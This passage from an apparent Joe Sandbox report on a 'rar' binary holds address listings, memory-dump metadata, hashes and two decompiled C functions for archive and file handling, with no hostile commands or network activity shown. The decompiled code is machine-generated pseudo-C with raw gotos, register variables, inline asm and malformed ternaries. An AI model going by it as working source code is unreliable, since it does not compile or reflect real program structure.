                                                                                                            0x7ff650b1a53e
                                                                                                            0x7ff650b1a543
                                                                                                            0x7ff650b1a546
                                                                                                            0x7ff650b1a551
                                                                                                            0x7ff650b1a556
                                                                                                            0x7ff650b1a564
                                                                                                            0x7ff650b1a571
                                                                                                            0x7ff650b1a573
                                                                                                            0x7ff650b1a576
                                                                                                            0x7ff650b1a57c
                                                                                                            0x7ff650b1a589
                                                                                                            0x7ff650b1a58f
                                                                                                            0x7ff650b1a594
                                                                                                            0x7ff650b1a597
                                                                                                            0x7ff650b1a59f
                                                                                                            0x7ff650b1a5a4
                                                                                                            0x7ff650b1a5a9
                                                                                                            0x7ff650b1a5ae
                                                                                                            0x7ff650b1a5b4
                                                                                                            0x7ff650b1a5bc
                                                                                                            0x7ff650b1a5c2
                                                                                                            0x7ff650b1a5c7
                                                                                                            0x7ff650b1a5cf
                                                                                                            0x7ff650b1a5d1
                                                                                                            0x7ff650b1a5e5
                                                                                                            0x7ff650b1a5f3
                                                                                                            0x7ff650b1a5f8
                                                                                                            0x7ff650b1a5fa
                                                                                                            0x7ff650b1a609
                                                                                                            0x7ff650b1a615
                                                                                                            0x7ff650b1a619
                                                                                                            0x7ff650b1a628
                                                                                                            0x7ff650b1a62d
                                                                                                            0x7ff650b1a630
                                                                                                            0x7ff650b1a640
                                                                                                            0x7ff650b1a64b
                                                                                                            0x7ff650b1a651
                                                                                                            0x7ff650b1a666
                                                                                                            0x7ff650b1a674
                                                                                                            0x7ff650b1a678
                                                                                                            0x7ff650b1a67c
                                                                                                            0x7ff650b1a68c
                                                                                                            0x7ff650b1a698
                                                                                                            0x7ff650b1a69a
                                                                                                            0x7ff650b1a6a7
                                                                                                            0x7ff650b1a6ac
                                                                                                            0x7ff650b1a6b9
                                                                                                            0x7ff650b1a6be
                                                                                                            0x7ff650b1a6cf
                                                                                                            0x7ff650b1a6dd
                                                                                                            0x7ff650b1a6e5
                                                                                                            0x7ff650b1a6f8
                                                                                                            0x7ff650b1a708
                                                                                                            0x7ff650b1a714
                                                                                                            0x7ff650b1a71f
                                                                                                            0x7ff650b1a727
                                                                                                            0x7ff650b1a736
                                                                                                            0x7ff650b1a73e
                                                                                                            0x7ff650b1a744
                                                                                                            0x7ff650b1a74a
                                                                                                            0x7ff650b1a75d
                                                                                                            0x7ff650b1a763
                                                                                                            0x7ff650b1a773
                                                                                                            0x7ff650b1a77e
                                                                                                            0x7ff650b1a793
                                                                                                            0x7ff650b1a7a6
                                                                                                            0x7ff650b1a7a8
                                                                                                            0x7ff650b1a7ab
                                                                                                            0x7ff650b1a7b6
                                                                                                            0x7ff650b1a7c9
                                                                                                            0x7ff650b1a7d6
                                                                                                            0x7ff650b1a7d8
                                                                                                            0x7ff650b1a7db
                                                                                                            0x7ff650b1a7e1
                                                                                                            0x7ff650b1a7f0
                                                                                                            0x7ff650b1a7f9
                                                                                                            0x7ff650b1a80b
                                                                                                            0x7ff650b1a816
                                                                                                            0x7ff650b1a829
                                                                                                            0x7ff650b1a82b
                                                                                                            0x7ff650b1a836
                                                                                                            0x7ff650b1a849
                                                                                                            0x7ff650b1a856
                                                                                                            0x7ff650b1a858
                                                                                                            0x7ff650b1a85e
                                                                                                            0x7ff650b1a86b
                                                                                                            0x7ff650b1a870
                                                                                                            0x7ff650b1a87e
                                                                                                            0x7ff650b1a88a
                                                                                                            0x7ff650b1a891
                                                                                                            0x7ff650b1a899
                                                                                                            0x7ff650b1a8d1

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateErrorLast$CloseHandleTime
                                                                                                            • String ID: bak
                                                                                                            • API String ID: 3502540287-311698538
                                                                                                            • Opcode ID: 5969ede30e92e9bb8a80eecddeed73eafaf9fa647ef8c19fb9b7f93e98141ef5
                                                                                                            • Instruction ID: daaafbd511f459632b19f855275584cf551d8fa08ccd9434018b61cd8e6cbee6
                                                                                                            • Opcode Fuzzy Hash: 5969ede30e92e9bb8a80eecddeed73eafaf9fa647ef8c19fb9b7f93e98141ef5
                                                                                                            • Instruction Fuzzy Hash: B8C1AE61A1C683B1EA64AB25C6D02FD2351BF57B84F484131DA0FA7BD6DF2EF5468700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B57B9C Relevance: 1.5, Strings: 1, Instructions: 265COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E00007FF67FF650B57B9C(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __r8, long long __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rbp;
				void* _t89;
				intOrPtr _t116;
				void* _t130;
				signed int _t141;
				void* _t178;
				signed long long _t194;
				signed long long _t195;
				long long _t197;
				long long _t238;
				signed long long _t254;
				void* _t262;
				void* _t263;
				void* _t268;
				void* _t269;
				void* _t271;
				signed long long _t272;
				long long _t280;
				long long _t282;
				void* _t286;
				long long _t289;
				long long _t291;

				_t284 = __r11;
				_t283 = __r10;
				_t280 = __r9;
				_t274 = __r8;
				_t238 = __rdx;
				_t197 = __rbx;
				_t158 = __edi;
				 *((long long*)(_t271 + 0x10)) = __rbx;
				 *((long long*)(_t271 + 0x18)) = __rsi;
				_t3 = _t271 - 0x14f40; // -83824
				_t269 = _t3;
				_t89 = E00007FF67FF650B69CB0(0x15040, __rax, __r10, __r11);
				_t272 = _t271 - __rax;
				_t194 =  *0x50b978f0; // 0x27db226282f1
				_t195 = _t194 ^ _t272;
				 *(_t269 + 0x14f30) = _t195;
				_t263 = __rcx;
				_t266 = __rcx + 0x1018;
				E00007FF67FF650B4511C(_t89, _t195, __rcx + 0x1018);
				r14d = 0;
				if ( *_t195 != 0x2d) goto 0x50b57bfb;
				if ( *((intOrPtr*)(_t195 + 2)) != r14w) goto 0x50b57bfb;
				goto 0x50b57c00;
				asm("sbb ebx, ebx");
				_t141 = r14d | 0x00000001;
				asm("sbb ecx, ecx");
				E00007FF67FF650B54598((__ecx & 0xfffffffe) + 0xd14, __edi, __rbx, __rcx + 0x1018, _t269, __r8);
				E00007FF67FF650B283F0(_t195, _t238, _t274, _t280, _t291);
				r15d = 0x800;
				r8d = r15d;
				_t7 = _t269 + 0x12f30; // -6208
				if (E00007FF67FF650B24300(_t197, _t263, _t7, _t266, _t269) == 0) goto 0x50b57fe5;
				E00007FF67FF650B54598(0xd10, __edi, _t197, _t266, _t269, _t274);
				_t8 = _t269 + 0x12f30; // -6208
				E00007FF67FF650B283F0(_t195, _t8, _t274, _t280, _t289);
				_t9 = _t269 + 0xf90; // -79840
				E00007FF67FF650B173C8(_t197, _t9, _t263, _t266, _t286, _t262);
				_t10 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B173C8(_t197, _t10, _t263, _t266);
				_t12 = _t269 + 0xf90; // -79840
				if (E00007FF67FF650B1AA04(0xd10, _t195, _t12, _t274) == 0) goto 0x50b57fb2;
				if (_t141 != 0) goto 0x50b57cbb;
				if ( *((intOrPtr*)(_t269 + 0x8f18)) != _t289) goto 0x50b57cbb;
				_t14 = _t197 + 0x25; // 0x25
				_t15 = _t269 + 0x12f30; // -6208
				E00007FF67FF650B111C0(_t14, _t15);
				goto 0x50b57fb2;
				if ( *((intOrPtr*)(_t269 + 0x8f08)) != 1) goto 0x50b57ccb;
				goto 0x50b57caa;
				_t17 = _t269 + 0xf90; // -79840
				if (E00007FF67FF650B19368(5, _t197, _t17) != 0) goto 0x50b57fb2;
				if ( *((intOrPtr*)(_t269 + 0x8f18)) == _t289) goto 0x50b57d0a;
				if (_t141 == 0) goto 0x50b57d0a;
				_t19 = _t269 + 0xf90; // -79840
				if (E00007FF67FF650B19368(4, _t197, _t19) != 0) goto 0x50b57fb2;
				_t20 = _t269 + 0xf90; // -79840
				E00007FF67FF650B1A91C(_t20);
				_t21 = _t269 + 0xf90; // -79840
				if (E00007FF67FF650B18144(_t21) != 0) goto 0x50b57fb2;
				_t22 = _t269 + 0x12f30; // -6208
				_t23 = _t269 + 0x13f30; // -2112
				E00007FF67FF650B5A390(_t23, _t22, _t291);
				_t24 = _t269 + 0x13f30; // -2112
				if (_t141 != 0) goto 0x50b57d5c;
				E00007FF67FF650B451A8(_t195, _t197, _t24, L"rar", _t266, _t291);
				goto 0x50b57d64;
				E00007FF67FF650B4526C(_t24, _t291);
				if ( *((intOrPtr*)(_t269 + 0x8f18)) - _t289 <= 0) goto 0x50b57de0;
				if (_t141 == 0) goto 0x50b57de0;
				_t26 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B192F8(_t197, _t26, _t266, _t268);
				if (_t141 == 0) goto 0x50b57dbe;
				_t27 = _t272 + 0x50; // 0x7fffffff8000004f
				E00007FF67FF650B31C28(_t27);
				E00007FF67FF650B32864();
				_t29 = _t269 + 0x9f60; // -43024
				_t30 = _t272 + 0x50; // 0x7fffffff8000004f
				E00007FF67FF650B31D58(_t195, _t197, _t30, _t29, _t269, 0x7fffffff);
				 *(_t269 + 0x11ee8) = _t195;
				_t32 = _t272 + 0x50; // 0x7fffffff8000004f
				E00007FF67FF650B31C70(_t32);
				r8d = 0;
				0x50b18318();
				goto 0x50b57e9d;
				 *((intOrPtr*)(_t272 + 0x38)) = r14b;
				 *((long long*)(_t272 + 0x30)) = _t289;
				 *((long long*)(_t272 + 0x28)) = 0x7fffffff;
				_t39 = _t272 + 0x40; // 0x7fffffff8000003f
				 *((long long*)(_t272 + 0x20)) = _t39;
				_t282 = _t291;
				_t41 = _t269 + 0x13f30; // -2112
				_t42 = _t269 + 0x9f60; // -43024
				if (E00007FF67FF650B317E8(_t197, _t263, _t42, _t263, _t266, _t269, _t41, _t282) != 0) goto 0x50b57d7d;
				if ( *((intOrPtr*)(_t272 + 0x40)) != r14b) goto 0x50b57fb2;
				_t44 = _t269 + 0x13f30; // -2112
				E00007FF67FF650B2C924( *((intOrPtr*)(_t272 + 0x40)) - r14b, _t197, 0x50ba7ab8, _t44, _t282);
				goto 0x50b57fb2;
				r9d =  *(_t269 + 0x44c4);
				_t116 =  *((intOrPtr*)(_t269 + 0x8f08));
				_t178 = _t116 - 2;
				if (_t178 < 0) goto 0x50b57e6b;
				if (_t178 != 0) goto 0x50b57e60;
				if (r9d == 0x1d) goto 0x50b57e6f;
				if ( *((intOrPtr*)(_t269 + 0x44c8)) != r14b) goto 0x50b57e6b;
				if (_t116 != 3) goto 0x50b57e6f;
				if (r9d - 0x32 <= 0) goto 0x50b57e6f;
				if (_t141 != 0) goto 0x50b57ec5;
				 *((intOrPtr*)(_t272 + 0x20)) = r14b;
				r9d = 0;
				r8d = 0;
				_t49 = _t282 + 2; // 0x2
				_t50 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B1B4D8(_t49, _t39, _t50, _t44, _t41, _t283, _t284);
				_t51 = _t269 + 0xf90; // -79840
				_t52 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B182C8(_t197, _t52, _t51, _t282);
				 *((long long*)(_t272 + 0x20)) = _t289;
				r9d = 0;
				r8b = 1;
				_t54 = _t269 + 0xf90; // -79840
				_t254 = _t54;
				_t55 = _t269 + 0x9f60; // -43024
				if (E00007FF67FF650B195E0(_t197, _t55, _t254, _t263, _t266, _t282) != 0) goto 0x50b57e3d;
				goto 0x50b57ef8;
				r9d = r9d - _t254 + _t254 * 4 + _t254 + _t254 * 4;
				r8d = 0xcccccccd * r9d >> 0x20 >> 3;
				_t62 = _t269 + 0x12f30; // -6208
				E00007FF67FF650B11244(0x27, _t62);
				_t63 = _t269 + 0xf90; // -79840
				E00007FF67FF650B31CF0(_t197, _t63);
				if ( *((long long*)(_t269 + 0xf98)) == 0xffffffff) goto 0x50b57fb2;
				 *((long long*)(_t272 + 0x48)) = _t289;
				if ( *((intOrPtr*)(_t263 + 0x71b0)) != 1) goto 0x50b57f3c;
				_t67 = _t272 + 0x48; // 0x7fffffff80000047
				_t68 = _t269 + 0xf90; // -79840
				E00007FF67FF650B32164(_t68, _t67);
				r9d = 0;
				r8d = 0;
				_t69 = _t272 + 0x48; // 0x7fffffff80000047
				_t70 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B32760(_t70, _t69, _t41, _t282);
				if ( *((intOrPtr*)(_t269 + 0x8f18)) - _t289 <= 0) goto 0x50b57f5e;
				if (_t141 == 0) goto 0x50b57f5e;
				_t72 = _t269 + 0xf90; // -79840
				_t73 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B1A464(0x27, _t141, _t39, _t197, _t73, _t72, _t41, _t282);
				goto 0x50b57f9f;
				_t74 = _t269 + 0x9f9a; // -42966
				_t75 = _t269 + 0x12f30; // -6208
				E00007FF67FF650B5A390(_t75, _t74, _t291);
				_t76 = _t269 + 0x9f60; // -43024
				_t130 = E00007FF67FF650B18198(0, _t197, _t76);
				if ( *((intOrPtr*)(_t263 + 0x71b0)) != 1) goto 0x50b57f9f;
				r8d = 0;
				_t78 = _t272 + 0x48; // 0x7fffffff80000047
				E00007FF67FF650B2EE10(_t130);
				E00007FF67FF650B54598(0xd26, _t158, _t197, _t266, _t269, _t291);
				E00007FF67FF650B283F0(_t39, _t78, _t291, _t282);
				_t80 = _t269 + 0x9f60; // -43024
				E00007FF67FF650B175D4(_t197, _t80);
				_t81 = _t269 + 0xf90; // -79840
				E00007FF67FF650B175D4(_t197, _t81);
				r8d = r15d;
				_t82 = _t269 + 0x12f30; // -6208
				if (E00007FF67FF650B24300(_t197, _t263, _t82, _t266, _t269) != 0) goto 0x50b57c46;
				if ( *((intOrPtr*)(_t263 + 0x7156)) != r14b) goto 0x50b58000;
				E00007FF67FF650B54598(0xd28, _t158, _t197, _t266, _t269, _t291);
				return E00007FF67FF650B69D10(E00007FF67FF650B283F0(_t39, _t82, _t291, _t282), 0xd28,  *(_t269 + 0x14f30) ^ _t272);
			}


























                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57b9c
                                                                                                            0x7ff650b57ba1
                                                                                                            0x7ff650b57bae
                                                                                                            0x7ff650b57bae
                                                                                                            0x7ff650b57bbb
                                                                                                            0x7ff650b57bc0
                                                                                                            0x7ff650b57bc3
                                                                                                            0x7ff650b57bca
                                                                                                            0x7ff650b57bcd
                                                                                                            0x7ff650b57bd4
                                                                                                            0x7ff650b57bd7
                                                                                                            0x7ff650b57be1
                                                                                                            0x7ff650b57be6
                                                                                                            0x7ff650b57bed
                                                                                                            0x7ff650b57bf4
                                                                                                            0x7ff650b57bf9
                                                                                                            0x7ff650b57bfb
                                                                                                            0x7ff650b57bfd
                                                                                                            0x7ff650b57c04
                                                                                                            0x7ff650b57c0f
                                                                                                            0x7ff650b57c17
                                                                                                            0x7ff650b57c1c
                                                                                                            0x7ff650b57c22
                                                                                                            0x7ff650b57c25
                                                                                                            0x7ff650b57c36
                                                                                                            0x7ff650b57c4b
                                                                                                            0x7ff650b57c53
                                                                                                            0x7ff650b57c5a
                                                                                                            0x7ff650b57c62
                                                                                                            0x7ff650b57c69
                                                                                                            0x7ff650b57c72
                                                                                                            0x7ff650b57c79
                                                                                                            0x7ff650b57c86
                                                                                                            0x7ff650b57c94
                                                                                                            0x7ff650b57c9c
                                                                                                            0x7ff650b57ca5
                                                                                                            0x7ff650b57ca7
                                                                                                            0x7ff650b57caa
                                                                                                            0x7ff650b57cb1
                                                                                                            0x7ff650b57cb6
                                                                                                            0x7ff650b57cc2
                                                                                                            0x7ff650b57cc9
                                                                                                            0x7ff650b57cd0
                                                                                                            0x7ff650b57cde
                                                                                                            0x7ff650b57ceb
                                                                                                            0x7ff650b57cef
                                                                                                            0x7ff650b57cf6
                                                                                                            0x7ff650b57d04
                                                                                                            0x7ff650b57d0a
                                                                                                            0x7ff650b57d11
                                                                                                            0x7ff650b57d16
                                                                                                            0x7ff650b57d24
                                                                                                            0x7ff650b57d2d
                                                                                                            0x7ff650b57d34
                                                                                                            0x7ff650b57d3b
                                                                                                            0x7ff650b57d40
                                                                                                            0x7ff650b57d49
                                                                                                            0x7ff650b57d55
                                                                                                            0x7ff650b57d5a
                                                                                                            0x7ff650b57d5f
                                                                                                            0x7ff650b57d6b
                                                                                                            0x7ff650b57d6f
                                                                                                            0x7ff650b57d71
                                                                                                            0x7ff650b57d78
                                                                                                            0x7ff650b57d7f
                                                                                                            0x7ff650b57d81
                                                                                                            0x7ff650b57d86
                                                                                                            0x7ff650b57d94
                                                                                                            0x7ff650b57d9c
                                                                                                            0x7ff650b57da3
                                                                                                            0x7ff650b57da8
                                                                                                            0x7ff650b57dad
                                                                                                            0x7ff650b57db4
                                                                                                            0x7ff650b57db9
                                                                                                            0x7ff650b57dc5
                                                                                                            0x7ff650b57dd6
                                                                                                            0x7ff650b57ddb
                                                                                                            0x7ff650b57de0
                                                                                                            0x7ff650b57de5
                                                                                                            0x7ff650b57dea
                                                                                                            0x7ff650b57def
                                                                                                            0x7ff650b57df4
                                                                                                            0x7ff650b57df9
                                                                                                            0x7ff650b57dfc
                                                                                                            0x7ff650b57e03
                                                                                                            0x7ff650b57e14
                                                                                                            0x7ff650b57e1f
                                                                                                            0x7ff650b57e25
                                                                                                            0x7ff650b57e33
                                                                                                            0x7ff650b57e38
                                                                                                            0x7ff650b57e3d
                                                                                                            0x7ff650b57e44
                                                                                                            0x7ff650b57e4a
                                                                                                            0x7ff650b57e4d
                                                                                                            0x7ff650b57e4f
                                                                                                            0x7ff650b57e55
                                                                                                            0x7ff650b57e5e
                                                                                                            0x7ff650b57e63
                                                                                                            0x7ff650b57e69
                                                                                                            0x7ff650b57e6d
                                                                                                            0x7ff650b57e6f
                                                                                                            0x7ff650b57e74
                                                                                                            0x7ff650b57e77
                                                                                                            0x7ff650b57e7a
                                                                                                            0x7ff650b57e7e
                                                                                                            0x7ff650b57e85
                                                                                                            0x7ff650b57e8a
                                                                                                            0x7ff650b57e91
                                                                                                            0x7ff650b57e98
                                                                                                            0x7ff650b57e9d
                                                                                                            0x7ff650b57ea2
                                                                                                            0x7ff650b57ea5
                                                                                                            0x7ff650b57ea8
                                                                                                            0x7ff650b57ea8
                                                                                                            0x7ff650b57eaf
                                                                                                            0x7ff650b57ebd
                                                                                                            0x7ff650b57ec3
                                                                                                            0x7ff650b57ed5
                                                                                                            0x7ff650b57ed8
                                                                                                            0x7ff650b57edb
                                                                                                            0x7ff650b57ee7
                                                                                                            0x7ff650b57eec
                                                                                                            0x7ff650b57ef3
                                                                                                            0x7ff650b57f00
                                                                                                            0x7ff650b57f06
                                                                                                            0x7ff650b57f12
                                                                                                            0x7ff650b57f14
                                                                                                            0x7ff650b57f19
                                                                                                            0x7ff650b57f20
                                                                                                            0x7ff650b57f25
                                                                                                            0x7ff650b57f28
                                                                                                            0x7ff650b57f2b
                                                                                                            0x7ff650b57f30
                                                                                                            0x7ff650b57f37
                                                                                                            0x7ff650b57f43
                                                                                                            0x7ff650b57f47
                                                                                                            0x7ff650b57f49
                                                                                                            0x7ff650b57f50
                                                                                                            0x7ff650b57f57
                                                                                                            0x7ff650b57f5c
                                                                                                            0x7ff650b57f61
                                                                                                            0x7ff650b57f68
                                                                                                            0x7ff650b57f6f
                                                                                                            0x7ff650b57f76
                                                                                                            0x7ff650b57f7d
                                                                                                            0x7ff650b57f89
                                                                                                            0x7ff650b57f8b
                                                                                                            0x7ff650b57f8e
                                                                                                            0x7ff650b57f9a
                                                                                                            0x7ff650b57fa4
                                                                                                            0x7ff650b57fac
                                                                                                            0x7ff650b57fb2
                                                                                                            0x7ff650b57fb9
                                                                                                            0x7ff650b57fbf
                                                                                                            0x7ff650b57fc6
                                                                                                            0x7ff650b57fcb
                                                                                                            0x7ff650b57fce
                                                                                                            0x7ff650b57fdf
                                                                                                            0x7ff650b57fec
                                                                                                            0x7ff650b57ff3
                                                                                                            0x7ff650b5802a

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: rar
                                                                                                            • API String ID: 0-1792618458
                                                                                                            • Opcode ID: 1873a5bbc1a1d50b3f2d2b11e444d375e9100a5012327a3044fd03490e76a7b9
                                                                                                            • Instruction ID: 5912fc7bba831a442fd5d0a42c632371913949af9b5e5580586b18d781edda11
                                                                                                            • Opcode Fuzzy Hash: 1873a5bbc1a1d50b3f2d2b11e444d375e9100a5012327a3044fd03490e76a7b9
                                                                                                            • Instruction Fuzzy Hash: F4C19362A186C369EB30DE24E9C15FD2365FF52344F580075DA0EEABDAEE3AD605C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B15A44 Relevance: 1.5, Strings: 1, Instructions: 235COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 48%
                                                                                                            			E00007FF67FF650B15A44(void* __ecx, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, signed long long __r9, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24, intOrPtr _a40, signed int _a48, signed int _a56) {
				char _v48;
				char _v56;
				void* __rdi;
				void* _t131;
				void* _t161;
				void* _t180;
				intOrPtr _t182;
				intOrPtr _t190;
				long long _t192;
				long long _t195;
				void* _t204;
				intOrPtr _t205;
				void* _t228;
				long long _t238;
				void* _t248;
				long long _t256;
				long long _t258;
				void* _t260;
				long long _t266;
				void* _t274;
				void* _t275;
				void* _t278;
				signed long long _t279;

				_t275 = __r11;
				_t274 = __r10;
				_t269 = __r9;
				_t264 = __r8;
				_t201 = __rbx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __rcx;
				_t279 = __r9;
				_t256 = __r8;
				_t278 = __rdx;
				_t258 = __rcx;
				r13d = 2;
				E00007FF67FF650B1E9C4(r13d, _t180, __rbx, __rdx, __rcx, _t260);
				r12d = 0;
				if ( *((intOrPtr*)(__rdx + 0x45c3)) == r12b) goto 0x50b15aa6;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t258 + 0x60)) + 0x6130)) != r12b) goto 0x50b15aa6;
				_t182 =  *((intOrPtr*)(__r9));
				 *0x50b80550();
				E00007FF67FF650B1596C(_t201, _t258, __rdx);
				_t202 = _t256 + 0x3518;
				E00007FF67FF650B36924( *((intOrPtr*)( *((intOrPtr*)(_t258 + 0x60)) + 0x6130)) - r12b,  *((intOrPtr*)(_t182 + 0x28)), _t256 + 0x3518, _t256 + 0x3518, __rdx + 0x3518, _t258, _t264);
				 *((intOrPtr*)(_t256 + 0x45c3)) = r12b;
				 *((intOrPtr*)(_t256 + 0x45c8)) = r12b;
				r8d = _a56;
				if (r8d == 0) goto 0x50b15aed;
				E00007FF67FF650B15EB0(_t202, _t258, _t202);
				 *(_t258 + 0x228) = _a48 ^ 0x00000001;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t258 + 0x60)) + 0x7154)) != r12b) goto 0x50b15b3f;
				if ( *((intOrPtr*)(_t258 + 0x78)) != r12d) goto 0x50b15b2d;
				E00007FF67FF650B54598(0xd5a, _t161, _t202, _t258, _t260, _t264);
				E00007FF67FF650B283F0( *((intOrPtr*)(_t258 + 0x60)), _t202, _t264, _t269);
				E00007FF67FF650B283F0(L"            ", _t202, _t264, _t269);
				 *((intOrPtr*)(_t258 + 0x78)) =  *((intOrPtr*)(_t258 + 0x78)) + 1;
				E00007FF67FF650B283F0(0x50b80a08, _t202, _t264, _t269);
				E00007FF67FF650B13498(_t202, _t278);
				if ( *((intOrPtr*)(_t278 + 0x4580)) == 0) goto 0x50b15e08;
				if ( *(_t278 + 0x3538) == r12b) goto 0x50b15e08;
				r8d = 0;
				 *0x50b80550();
				_t27 = _t258 + 0x2e0; // 0xec60
				r8d =  *( *((intOrPtr*)(_t258 + 0x60)) + 0x9518);
				E00007FF67FF650B366EC( *((intOrPtr*)(_t278 + 0x4598)), _t202, _t27, _t258, _t274, _t275);
				_t30 = _t258 + 0x320; // 0xeca0
				r8d =  *( *((intOrPtr*)(_t258 + 0x60)) + 0x9518);
				E00007FF67FF650B366EC( *((intOrPtr*)(_t278 + 0x4598)), _t202, _t30, _t258, _t274, _t275);
				_t32 = _t258 + 0x300; // 0xec80
				r8d =  *( *((intOrPtr*)(_t258 + 0x60)) + 0x9518);
				E00007FF67FF650B366EC( *((intOrPtr*)(_t278 + 0x4598)), _t202, _t32, _t258, _t274, _t275);
				_t35 = _t258 + 0x178; // 0xeaf8
				_t248 = _t278;
				E00007FF67FF650B49BBC( *((intOrPtr*)(_t258 + 0x60)), _t35, _t248, _t256);
				 *(_t258 + 0x2a0) =  *(_t258 + 0x2a0) & 0x00000000;
				 *(_t258 + 0x2a8) =  *(_t258 + 0x2a8) & 0x00000000;
				 *(_t258 + 0x290) =  *(_t258 + 0x290) & 0x00000000;
				 *((char*)(_t258 + 0x229)) = 1;
				 *((char*)(_t258 + 0x8d)) =  *((intOrPtr*)(_t278 + 0x4618));
				 *((char*)(_t256 + 0x4618)) =  *((intOrPtr*)(_t258 + 0x8c));
				_t190 =  *((intOrPtr*)(_t258 + 0x60));
				 *((long long*)(_t256 + 0x4620)) =  *((intOrPtr*)(_t190 + 0x10));
				_t51 = _t190 + 0x15; // 0x32
				_t126 =  ==  ? _t51 : 0x1d;
				 *((intOrPtr*)(_t256 + 0x3534)) =  ==  ? _t51 : 0x1d;
				if ( *((char*)( *((intOrPtr*)(_t258 + 0x60)) + 0x6130)) == 0) goto 0x50b15ca3;
				 *((char*)(_t256 + 0x45c8)) = 1;
				 *((char*)(_t256 + 0x45c3)) = 1;
				if ( *((intOrPtr*)(_t256 + 0x7f78)) != 3) goto 0x50b15ca3;
				asm("movups xmm0, [edi+0x7f92]");
				asm("movdqu [edi+0x45c9], xmm0");
				E00007FF67FF650B29B14(_t202, _t256 + 0x45d9, _t248, _t258, _t256);
				 *((intOrPtr*)(_t256 + 0x4614)) = 0xf;
				 *((char*)(_t256 + 0x45e9)) = 1;
				if ( *((intOrPtr*)(_t256 + 0x7f78)) != 3) goto 0x50b15d15;
				_t192 =  *((intOrPtr*)(_t278 + 0x4580));
				_t204 =  <=  ? _t192 :  *((intOrPtr*)(_t278 + 0x4588));
				r8d = 0;
				E00007FF67FF650B14074(0, _t204);
				_t266 = _t192;
				 *((long long*)(_t256 + 0x4590)) = _t192;
				_t64 = _t192 - 0x400; // -1024
				_t249 =  >  ? _t64 : _t248;
				_t250 = ( >  ? _t64 : _t248) >> 3;
				_t227 = (( >  ? _t64 : _t248) >> 3) + _t250 * 8;
				_t228 =  <  ? _t204 : (( >  ? _t64 : _t248) >> 3) + _t250 * 8;
				_t229 =  >  ? _t266 : _t228;
